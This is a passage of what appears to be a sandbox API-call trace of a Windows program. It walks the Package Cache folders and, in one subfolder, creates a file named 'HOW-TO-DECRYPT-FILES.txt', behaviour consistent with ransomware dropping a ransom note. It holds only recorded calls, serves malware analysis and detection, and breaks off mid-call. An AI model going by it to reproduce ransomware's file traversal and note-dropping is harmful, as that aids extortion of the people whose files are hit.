[0048.037] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.037] SetErrorMode (uMode=0x0) returned 0x1 [0048.037] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache", lpFilePart=0x0) returned 0x20 [0048.037] GetLastError () returned 0x12 [0048.038] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.038] GetLastError () returned 0x12 [0048.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.038] GetLastError () returned 0x12 [0048.038] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache", lpFilePart=0x0) returned 0x20 [0048.038] GetLastError () returned 0x12 [0048.038] SetErrorMode (uMode=0x1) returned 0x0 [0048.038] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.039] GetLastError () returned 0x12 [0048.039] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.039] GetLastError () returned 0x12 [0048.039] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.039] GetLastError () returned 0x12 [0048.039] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.039] GetLastError () returned 0x12 [0048.039] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.039] GetLastError () returned 0x12 [0048.039] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.039] GetLastError () returned 0x12 [0048.039] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.039] GetLastError () returned 0x12 [0048.040] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.040] GetLastError () returned 0x12 [0048.040] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.040] GetLastError () returned 0x12 [0048.040] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.040] GetLastError () returned 0x12 [0048.040] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.040] GetLastError () returned 0x12 [0048.040] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.040] GetLastError () returned 0x12 [0048.040] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.040] GetLastError () returned 0x12 [0048.040] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.040] GetLastError () returned 0x12 [0048.041] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.041] SetErrorMode (uMode=0x0) returned 0x1 [0048.041] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache", lpFilePart=0x0) returned 0x20 [0048.041] GetLastError () returned 0x12 [0048.041] SetErrorMode (uMode=0x1) returned 0x0 [0048.042] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.042] GetLastError () returned 0x12 [0048.042] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.042] GetLastError () returned 0x12 [0048.043] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.043] GetLastError () returned 0x12 [0048.043] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.043] GetLastError () returned 0x12 [0048.043] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.043] GetLastError () returned 0x12 [0048.043] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.043] GetLastError () returned 0x12 [0048.043] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.043] GetLastError () returned 0x12 [0048.043] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.043] GetLastError () returned 0x12 [0048.043] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.043] GetLastError () returned 0x12 [0048.044] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.044] GetLastError () returned 0x12 [0048.044] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.044] GetLastError () returned 0x12 [0048.044] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.044] GetLastError () returned 0x12 [0048.044] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.044] GetLastError () returned 0x12 [0048.044] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.044] GetLastError () returned 0x12 [0048.044] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.045] SetErrorMode (uMode=0x0) returned 0x1 [0048.045] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88", lpFilePart=0x0) returned 0x49 [0048.045] GetLastError () returned 0x12 [0048.045] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.045] GetLastError () returned 0x12 [0048.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.045] GetLastError () returned 0x12 [0048.045] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88", lpFilePart=0x0) returned 0x49 [0048.045] GetLastError () returned 0x12 [0048.045] SetErrorMode (uMode=0x1) returned 0x0 [0048.045] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.047] GetLastError () returned 0x12 [0048.047] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.047] GetLastError () returned 0x12 [0048.047] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.047] GetLastError () returned 0x12 [0048.047] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.047] GetLastError () returned 0x12 [0048.047] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.047] SetErrorMode (uMode=0x0) returned 0x1 [0048.047] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88", lpFilePart=0x0) returned 0x49 [0048.047] GetLastError () returned 0x12 [0048.047] SetErrorMode (uMode=0x1) returned 0x0 [0048.047] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.048] GetLastError () returned 0x12 [0048.048] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.048] GetLastError () returned 0x12 [0048.048] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.048] GetLastError () returned 0x12 [0048.048] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.048] GetLastError () returned 0x12 [0048.048] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.048] SetErrorMode (uMode=0x0) returned 0x1 [0048.048] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages", lpFilePart=0x0) returned 0x52 [0048.048] GetLastError () returned 0x12 [0048.048] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.048] GetLastError () returned 0x12 [0048.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.048] GetLastError () returned 0x12 [0048.048] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages", lpFilePart=0x0) returned 0x52 [0048.048] GetLastError () returned 0x12 [0048.048] SetErrorMode (uMode=0x1) returned 0x0 [0048.049] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.049] GetLastError () returned 0x12 [0048.049] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.049] GetLastError () returned 0x12 [0048.049] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.049] GetLastError () returned 0x12 [0048.049] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.050] GetLastError () returned 0x12 [0048.050] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.050] SetErrorMode (uMode=0x0) returned 0x1 [0048.050] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages", lpFilePart=0x0) returned 0x52 [0048.050] GetLastError () returned 0x12 [0048.050] SetErrorMode (uMode=0x1) returned 0x0 [0048.050] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.050] GetLastError () returned 0x12 [0048.050] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.050] GetLastError () returned 0x12 [0048.050] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.050] GetLastError () returned 0x12 [0048.050] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.050] GetLastError () returned 0x12 [0048.050] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.050] SetErrorMode (uMode=0x0) returned 0x1 [0048.051] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch", lpFilePart=0x0) returned 0x58 [0048.051] GetLastError () returned 0x12 [0048.051] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.051] GetLastError () returned 0x12 [0048.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.051] GetLastError () returned 0x12 [0048.051] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch", lpFilePart=0x0) returned 0x58 [0048.051] GetLastError () returned 0x12 [0048.051] SetErrorMode (uMode=0x1) returned 0x0 [0048.051] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.051] GetLastError () returned 0x12 [0048.052] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.052] GetLastError () returned 0x12 [0048.052] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.052] GetLastError () returned 0x12 [0048.052] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.052] GetLastError () returned 0x12 [0048.052] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.052] SetErrorMode (uMode=0x0) returned 0x1 [0048.052] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch", lpFilePart=0x0) returned 0x58 [0048.052] GetLastError () returned 0x12 [0048.052] SetErrorMode (uMode=0x1) returned 0x0 [0048.052] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.052] GetLastError () returned 0x12 [0048.052] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.052] GetLastError () returned 0x12 [0048.053] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.053] GetLastError () returned 0x12 [0048.053] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.053] GetLastError () returned 0x12 [0048.053] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.053] SetErrorMode (uMode=0x0) returned 0x1 [0048.053] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86", lpFilePart=0x0) returned 0x5c [0048.053] GetLastError () returned 0x12 [0048.053] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.053] GetLastError () returned 0x12 [0048.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0048.053] GetLastError () returned 0x12 [0048.053] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86", lpFilePart=0x0) returned 0x5c [0048.053] GetLastError () returned 0x12 [0048.053] SetErrorMode (uMode=0x1) returned 0x0 [0048.053] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.053] GetLastError () returned 0x12 [0048.053] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.053] GetLastError () returned 0x12 [0048.053] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.053] GetLastError () returned 0x12 [0048.053] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.054] GetLastError () returned 0x12 [0048.054] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.054] SetErrorMode (uMode=0x0) returned 0x1 [0048.054] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86", lpFilePart=0x0) returned 0x5c [0048.054] GetLastError () returned 0x12 [0048.054] SetErrorMode (uMode=0x1) returned 0x0 [0048.054] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.054] GetLastError () returned 0x12 [0048.054] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.054] GetLastError () returned 0x12 [0048.054] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.054] GetLastError () returned 0x12 [0048.054] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.054] GetLastError () returned 0x12 [0048.054] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.054] SetErrorMode (uMode=0x0) returned 0x1 [0048.054] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu", lpFilePart=0x0) returned 0x79 [0048.054] GetLastError () returned 0x12 [0048.054] SetErrorMode (uMode=0x1) returned 0x0 [0048.054] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu" (normalized: "c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\x86\\windows6.1-kb2999226-x86.msu"), fInfoLevelId=0x0, lpFileInformation=0x1c8cc78 | out: lpFileInformation=0x1c8cc78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc7afb00, ftCreationTime.dwHighDateTime=0x1d28816, ftLastAccessTime.dwLowDateTime=0xbc7afb00, ftLastAccessTime.dwHighDateTime=0x1d28816, ftLastWriteTime.dwLowDateTime=0xbc7afb00, ftLastWriteTime.dwHighDateTime=0x1d28816, nFileSizeHigh=0x0, nFileSizeLow=0x9990e)) returned 1 [0048.055] GetLastError () returned 0x12 [0048.055] SetErrorMode (uMode=0x0) returned 0x1 [0048.055] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x75 [0048.055] GetLastError () returned 0x12 [0048.055] SetErrorMode (uMode=0x1) returned 0x0 [0048.055] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\x86\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0048.055] GetLastError () returned 0x0 [0048.055] GetFileType (hFile=0x184) returned 0x1 [0048.056] SetErrorMode (uMode=0x0) returned 0x1 [0048.056] GetFileType (hFile=0x184) returned 0x1 [0048.056] CloseHandle (hObject=0x184) returned 1 [0048.057] GetLastError () returned 0x0 [0048.057] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x75 [0048.057] GetLastError () returned 0x0 [0048.057] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0048.057] GetLastError () returned 0x0 [0048.057] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.057] GetLastError () returned 0x0 [0048.057] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.058] GetLastError () returned 0x0 [0048.058] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.058] GetLastError () returned 0x0 [0048.058] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.058] GetLastError () returned 0x12 [0048.058] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.058] SetErrorMode (uMode=0x0) returned 0x1 [0048.058] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.058] GetLastError () returned 0x12 [0048.058] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.058] GetLastError () returned 0x12 [0048.058] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.058] GetLastError () returned 0x12 [0048.058] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.058] GetLastError () returned 0x12 [0048.058] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.058] SetErrorMode (uMode=0x0) returned 0x1 [0048.058] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.059] GetLastError () returned 0x12 [0048.059] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.059] GetLastError () returned 0x12 [0048.059] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.059] GetLastError () returned 0x12 [0048.059] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.059] GetLastError () returned 0x12 [0048.059] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.059] SetErrorMode (uMode=0x0) returned 0x1 [0048.059] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.059] GetLastError () returned 0x12 [0048.059] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.059] GetLastError () returned 0x12 [0048.059] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.059] GetLastError () returned 0x12 [0048.059] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.059] GetLastError () returned 0x12 [0048.059] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.059] SetErrorMode (uMode=0x0) returned 0x1 [0048.059] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.060] GetLastError () returned 0x12 [0048.060] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.060] GetLastError () returned 0x12 [0048.060] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.060] GetLastError () returned 0x12 [0048.060] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0048.060] GetLastError () returned 0x12 [0048.060] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0048.060] SetErrorMode (uMode=0x0) returned 0x1 [0048.060] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0048.060] GetLastError () returned 0x12 [0048.060] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0048.060] GetLastError () returned 0x12 [0048.060] FindNextFileW (in: hFindFile=0x360b60, 